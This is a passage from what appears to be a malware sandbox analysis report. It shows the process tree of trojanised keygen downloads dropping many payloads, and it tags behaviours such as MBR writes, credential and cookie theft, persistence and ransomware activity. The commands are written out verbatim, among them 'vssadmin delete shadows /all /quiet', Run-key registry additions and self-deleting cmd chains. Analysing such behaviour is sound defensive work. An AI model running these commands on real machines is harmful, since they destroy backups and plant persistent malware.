          • C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
            Executes dropped EXE
            Loads dropped DLL
            PID:436
            • C:\Users\Admin\AppData\Local\Temp\sibA11.tmp\0\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\sibA11.tmp\0\setup.exe" -s
              Executes dropped EXE
              PID:3264
              • C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe
                "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
                Writes to the Master Boot Record (MBR)
                Suspicious use of NtSetInformationThreadHideFromDebugger
                Modifies system certificate store
                PID:2952
                • C:\Windows\SysWOW64\msiexec.exe
                  msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                  Enumerates connected drives
                  Suspicious behavior: GetForegroundWindowSpam
                  Suspicious use of FindShellTrayWindow
                  PID:3188
                • C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
                  C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 0011 installp1
                  Writes to the Master Boot Record (MBR)
                  PID:3912
                  • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                    C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                    PID:4596
                  • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                    "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                    Writes to the Master Boot Record (MBR)
                    PID:2184
                  • C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe
                    C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent
                    PID:4108
                    • C:\Users\Admin\AppData\Local\Temp\is-B0QUR.tmp\1021C014A4C9A552.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-B0QUR.tmp\1021C014A4C9A552.tmp" /SL5="$60176,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent
                      PID:1944
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
                    PID:5956
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 3
                      Runs ping.exe
                      PID:4052
                • C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
                  C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 200 installp1
                  Writes to the Master Boot Record (MBR)
                  PID:3952
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    PID:1860
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      Kills process with taskkill
                      PID:2412
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
                    PID:4576
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 3
                      Runs ping.exe
                      PID:2672
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
                  PID:4196
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    Runs ping.exe
                    PID:4320
          • C:\Users\Admin\AppData\Local\Temp\RarSFX4\jg2_2qua.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX4\jg2_2qua.exe"
            Modifies system certificate store
            PID:3268
    • C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
      "C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1248
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        PID:240
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
          intro.exe 1O5ZF
          Executes dropped EXE
          PID:996
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          Executes dropped EXE
          Loads dropped DLL
          Suspicious use of WriteProcessMemory
          PID:1320
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of SetThreadContext
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            PID:1236
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
              Executes dropped EXE
              PID:620
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          Executes dropped EXE
          PID:1604
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          Executes dropped EXE
          Loads dropped DLL
          PID:316
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:1940
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
            Executes dropped EXE
            Loads dropped DLL
            PID:2604
            • C:\Users\Admin\AppData\Local\Temp\sib1019.tmp\0\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\sib1019.tmp\0\setup.exe" -s
              Executes dropped EXE
              PID:3304
              • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe
                "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
                PID:3964
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
                  PID:1676
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    Runs ping.exe
                    PID:2128
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
            PID:4340
    • C:\Users\Admin\Desktop\Magic_File_v3_keygen_by_KeygenNinja.exe
      "C:\Users\Admin\Desktop\Magic_File_v3_keygen_by_KeygenNinja.exe"
      Executes dropped EXE
      PID:2356
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen.bat" "
        Loads dropped DLL
        PID:2144
        • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          Executes dropped EXE
          Loads dropped DLL
          PID:2696
          • C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe"
            Executes dropped EXE
            Suspicious use of SetThreadContext
            PID:2652
            • C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe -txt -scanlocal -file:potato.dat
              Executes dropped EXE
              PID:3024
        • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exe
          keygen-step-3.exe
          Executes dropped EXE
          PID:2876
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exe"
            PID:2164
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              Runs ping.exe
              PID:3008
        • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-4.exe
          keygen-step-4.exe
          Executes dropped EXE
          Loads dropped DLL
          PID:2964
          • C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"
            Executes dropped EXE
            Loads dropped DLL
            Writes to the Master Boot Record (MBR)
            Suspicious use of NtSetInformationThreadHideFromDebugger
            Suspicious use of SetThreadContext
            PID:1288
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\system32\rundll32.exe 001 install5
              Blocklisted process makes network request
              Writes to the Master Boot Record (MBR)
              PID:3284
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\system32\rundll32.exe 002 install5
              PID:3948
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                PID:3828
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  Kills process with taskkill
                  PID:3792
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im firefox.exe
                PID:2384
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im firefox.exe
                  Kills process with taskkill
                  PID:1812
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\system32\rundll32.exe 003 install5
              Suspicious use of SetThreadContext
              PID:4012
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\system32\rundll32.exe"
                Suspicious use of SetWindowsHookEx
                PID:3132
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"
              PID:4024
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.0.0.1 -n 3
                Runs ping.exe
                PID:3668
          • C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe"
            Suspicious use of SetThreadContext
            PID:3396
            • C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe
              "{path}"
              PID:4004
            • C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe
              "{path}"
              PID:3968
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 904
                Program crash
                Suspicious behavior: GetForegroundWindowSpam
                PID:4828
          • C:\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe"
            Adds Run key to start application
            PID:3676
            • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
              PID:4428
            • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
              PID:4924
          • C:\Users\Admin\AppData\Local\Temp\RarSFX8\id6.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX8\id6.exe"
            Suspicious use of SetWindowsHookEx
            PID:1160
            • C:\Users\Admin\AppData\Local\Temp\RarSFX8\lcx.exe
              lcx.exe version2.txt
              PID:2036
          • C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe"
            PID:2188
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe"
              PID:1420
              • C:\Windows\SysWOW64\PING.EXE
                ping 1.1.1.1 -n 1 -w 3000
                Runs ping.exe
                PID:2548
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX8\DreamTrips.bat" "
            PID:4648
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1Hgx67
              Modifies Internet Explorer settings
              Suspicious use of FindShellTrayWindow
              Suspicious use of SetWindowsHookEx
              PID:4716
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4716 CREDAT:275457 /prefetch:2
                Modifies Internet Explorer settings
                Suspicious use of SetWindowsHookEx
                PID:2568
          • C:\Users\Admin\AppData\Local\Temp\RarSFX8\wyfdggaa.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX8\wyfdggaa.exe"
            Checks whether UAC is enabled
            Suspicious use of SetWindowsHookEx
            PID:3376
    • C:\Users\Admin\Desktop\LtHv0O2KZDK4M637.exe
      "C:\Users\Admin\Desktop\LtHv0O2KZDK4M637.exe"
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1732
    • C:\Users\Admin\Desktop\api.exe
      "C:\Users\Admin\Desktop\api.exe"
      Executes dropped EXE
      Enumerates connected drives
      Writes to the Master Boot Record (MBR)
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:2308
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" "https://adlice.com/thanks-downloading-diag/?utm_campaign=diag&utm_source=soft&utm_medium=btn"
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        PID:1208
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1208 CREDAT:275457 /prefetch:2
          Drops desktop.ini file(s)
          Modifies Internet Explorer settings
          Suspicious use of SetWindowsHookEx
          PID:4436
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1208 CREDAT:930819 /prefetch:2
          Modifies Internet Explorer settings
          Suspicious use of SetWindowsHookEx
          PID:6060
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1208 CREDAT:668676 /prefetch:2
          Suspicious use of SetWindowsHookEx
          PID:2164
    • C:\Users\Admin\Desktop\31.exe
      "C:\Users\Admin\Desktop\31.exe"
      Executes dropped EXE
      PID:3036
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3F.tmp\40.tmp\41.bat C:\Users\Admin\Desktop\31.exe"
        PID:2980
        • C:\Program Files\Java\jre7\bin\javaw.exe
          "C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\1.jar"
          PID:2536
        • C:\Users\Admin\AppData\Roaming\2.exe
          C:\Users\Admin\AppData\Roaming\2.exe
          Executes dropped EXE
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: EnumeratesProcesses
          Suspicious behavior: MapViewOfSection
          PID:1076
          • C:\Users\Admin\AppData\Roaming\2.exe
            C:\Users\Admin\AppData\Roaming\2.exe
            Executes dropped EXE
            Suspicious use of SetThreadContext
            Suspicious behavior: EnumeratesProcesses
            Suspicious behavior: MapViewOfSection
            Suspicious use of AdjustPrivilegeToken
            PID:2148
        • C:\Users\Admin\AppData\Roaming\3.exe
          C:\Users\Admin\AppData\Roaming\3.exe
          Executes dropped EXE
          Checks QEMU agent file
          Adds Run key to start application
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: MapViewOfSection
          Suspicious use of SetWindowsHookEx
          PID:2632
          • C:\Users\Admin\AppData\Roaming\3.exe
            C:\Users\Admin\AppData\Roaming\3.exe
            Checks QEMU agent file
            Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:4288
        • C:\Users\Admin\AppData\Roaming\4.exe
          C:\Users\Admin\AppData\Roaming\4.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2744
          • C:\Windows\SysWOW64\regsvr32.exe
            C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\4.dll f1 C:\Users\Admin\AppData\Roaming\4.exe@2744
            PID:3712
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\4.dll,f0
              Blocklisted process makes network request
              PID:3800
        • C:\Users\Admin\AppData\Roaming\5.exe
          C:\Users\Admin\AppData\Roaming\5.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: GetForegroundWindowSpam
          Suspicious use of AdjustPrivilegeToken
          Suspicious use of SetWindowsHookEx
          PID:2588
        • C:\Users\Admin\AppData\Roaming\6.exe
          C:\Users\Admin\AppData\Roaming\6.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:1776
        • C:\Users\Admin\AppData\Roaming\7.exe
          C:\Users\Admin\AppData\Roaming\7.exe
          Executes dropped EXE
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of SetWindowsHookEx
          PID:1900
        • C:\Users\Admin\AppData\Roaming\8.exe
          C:\Users\Admin\AppData\Roaming\8.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of AdjustPrivilegeToken
          PID:2352
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"
            PID:1632
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"
              Adds Run key to start application
              PID:2676
          • C:\Users\Admin\AppData\Roaming\feeed.exe
            "C:\Users\Admin\AppData\Roaming\feeed.exe"
            Suspicious use of SetThreadContext
            PID:5016
            • C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
              "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
              Suspicious behavior: SetClipboardViewer
              Suspicious use of SetWindowsHookEx
              PID:3704
              • C:\Windows\SysWOW64\netsh.exe
                "netsh" wlan show profile
                PID:2192
        • C:\Users\Admin\AppData\Roaming\9.exe
          C:\Users\Admin\AppData\Roaming\9.exe
          Executes dropped EXE
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2180
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wWTxgR" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9AC9.tmp"
            Creates scheduled task(s)
            PID:3664
          • C:\Users\Admin\AppData\Roaming\9.exe
            "{path}"
            PID:4628
          • C:\Users\Admin\AppData\Roaming\9.exe
            "{path}"
            PID:4648
          • C:\Users\Admin\AppData\Roaming\9.exe
            "{path}"
            PID:4656
          • C:\Users\Admin\AppData\Roaming\9.exe
            "{path}"
            PID:4680
          • C:\Users\Admin\AppData\Roaming\9.exe
            "{path}"
            PID:4700
            • C:\Windows\SysWOW64\netsh.exe
              "netsh" wlan show profile
              PID:1848
        • C:\Users\Admin\AppData\Roaming\10.exe
          C:\Users\Admin\AppData\Roaming\10.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2076
        • C:\Users\Admin\AppData\Roaming\11.exe
          C:\Users\Admin\AppData\Roaming\11.exe
          Executes dropped EXE
          Checks BIOS information in registry
          Maps connected drives based on registry
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:1844
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp25B9.tmp"
            Creates scheduled task(s)
            PID:4524
          • C:\Users\Admin\AppData\Roaming\11.exe
            "{path}"
            Suspicious use of SetThreadContext
            Suspicious behavior: MapViewOfSection
            PID:2828
        • C:\Users\Admin\AppData\Roaming\12.exe
          C:\Users\Admin\AppData\Roaming\12.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2124
        • C:\Users\Admin\AppData\Roaming\13.exe
          C:\Users\Admin\AppData\Roaming\13.exe
          Executes dropped EXE
          Checks QEMU agent file
          Adds Run key to start application
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: MapViewOfSection
          Suspicious use of SetWindowsHookEx
          PID:1604
          • C:\Users\Admin\AppData\Roaming\13.exe
            C:\Users\Admin\AppData\Roaming\13.exe
            Checks QEMU agent file
            Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:4312
            • C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe
              "C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"
              Checks QEMU agent file
              Adds Run key to start application
              Suspicious use of NtSetInformationThreadHideFromDebugger
              Suspicious use of SetThreadContext
              Suspicious behavior: MapViewOfSection
              Suspicious use of SetWindowsHookEx
              PID:1908
              • C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe
                "C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"
                Checks QEMU agent file
                Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:3760
        • C:\Users\Admin\AppData\Roaming\14.exe
          C:\Users\Admin\AppData\Roaming\14.exe
          Executes dropped EXE
          Modifies system certificate store
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2648
        • C:\Users\Admin\AppData\Roaming\15.exe
          C:\Users\Admin\AppData\Roaming\15.exe
          Executes dropped EXE
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of SetWindowsHookEx
          PID:1944
        • C:\Users\Admin\AppData\Roaming\16.exe
          C:\Users\Admin\AppData\Roaming\16.exe
          Executes dropped EXE
          Modifies extensions of user files
          Drops startup file
          Adds Run key to start application
          Drops desktop.ini file(s)
          Drops file in System32 directory
          Drops file in Program Files directory
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: RenamesItself
          PID:816
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe"
            PID:952
            • C:\Windows\system32\mode.com
              mode con cp select=1251
              PID:3628
            • C:\Windows\system32\vssadmin.exe
              vssadmin delete shadows /all /quiet
              Interacts with shadow copies
              PID:4044
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe"
            PID:4316
            • C:\Windows\system32\mode.com
              mode con cp select=1251
              PID:6116
            • C:\Windows\system32\vssadmin.exe
              vssadmin delete shadows /all /quiet
              Interacts with shadow copies
              PID:1112
          • C:\Windows\System32\mshta.exe
            "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
            PID:5508
          • C:\Windows\System32\mshta.exe
            "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
            Modifies Internet Explorer settings
            PID:5876
        • C:\Users\Admin\AppData\Roaming\17.exe
          C:\Users\Admin\AppData\Roaming\17.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2012
        • C:\Users\Admin\AppData\Roaming\18.exe
          C:\Users\Admin\AppData\Roaming\18.exe
          Executes dropped EXE
          Maps connected drives based on registry
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: MapViewOfSection
          Suspicious use of AdjustPrivilegeToken
          PID:3068
        • C:\Users\Admin\AppData\Roaming\19.exe
          C:\Users\Admin\AppData\Roaming\19.exe
          Executes dropped EXE
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: MapViewOfSection
          Suspicious use of SetWindowsHookEx
          PID:3008
          • C:\Users\Admin\AppData\Roaming\19.exe
            C:\Users\Admin\AppData\Roaming\19.exe
            Checks QEMU agent file
            Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:4936
        • C:\Users\Admin\AppData\Roaming\20.exe
          C:\Users\Admin\AppData\Roaming\20.exe
          Executes dropped EXE
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of SetWindowsHookEx
          PID:3136
        • C:\Users\Admin\AppData\Roaming\21.exe
          C:\Users\Admin\AppData\Roaming\21.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:3384
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 476
            PID:3124
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 500
            Program crash
            Suspicious behavior: GetForegroundWindowSpam
            PID:1720
        • C:\Users\Admin\AppData\Roaming\22.exe
          C:\Users\Admin\AppData\Roaming\22.exe
          Executes dropped EXE
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:3552
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            Suspicious behavior: GetForegroundWindowSpam
            PID:4800
        • C:\Users\Admin\AppData\Roaming\23.exe
          C:\Users\Admin\AppData\Roaming\23.exe
          Executes dropped EXE
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: MapViewOfSection
          Suspicious use of SetWindowsHookEx
          PID:3744
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            C:\Users\Admin\AppData\Roaming\23.exe
            Checks QEMU agent file
            Adds Run key to start application
            Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:3808
        • C:\Users\Admin\AppData\Roaming\24.exe
          C:\Users\Admin\AppData\Roaming\24.exe
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:3832
          • C:\Users\Admin\AppData\Roaming\24.exe
            "{path}"
            Drops file in Drivers directory
            Suspicious use of SetWindowsHookEx
            PID:1552
            • C:\Windows\SysWOW64\netsh.exe
              "netsh" wlan show profile
              PID:3888
        • C:\Users\Admin\AppData\Roaming\25.exe
          C:\Users\Admin\AppData\Roaming\25.exe
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of SetWindowsHookEx
          PID:3868
        • C:\Users\Admin\AppData\Roaming\26.exe
          C:\Users\Admin\AppData\Roaming\26.exe
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of AdjustPrivilegeToken
          PID:3956
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qATVyEXYNcqQZF" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1555.tmp"
            Creates scheduled task(s)
            PID:4116
          • C:\Users\Admin\AppData\Roaming\26.exe
            "{path}"
            PID:4580
        • C:\Users\Admin\AppData\Roaming\27.exe
          C:\Users\Admin\AppData\Roaming\27.exe
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:4016
          • C:\Users\Admin\AppData\Roaming\27.exe
            C:\Users\Admin\AppData\Roaming\27.exe /C
            PID:4092
          • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe
            C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe
            Adds Run key to start application
            Suspicious behavior: MapViewOfSection
            PID:4356
            • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe
              C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe /C
              PID:3924
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              PID:3664
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              PID:1948
            • C:\Windows\SysWOW64\mobsync.exe
              C:\Windows\SysWOW64\mobsync.exe
              PID:2256
            • C:\Windows\SysWOW64\mobsync.exe
              C:\Windows\SysWOW64\mobsync.exe
              PID:2168
            • C:\Program Files (x86)\Internet Explorer\iexplore.exe
              "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
              PID:2116
            • C:\Program Files (x86)\Internet Explorer\iexplore.exe
              "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
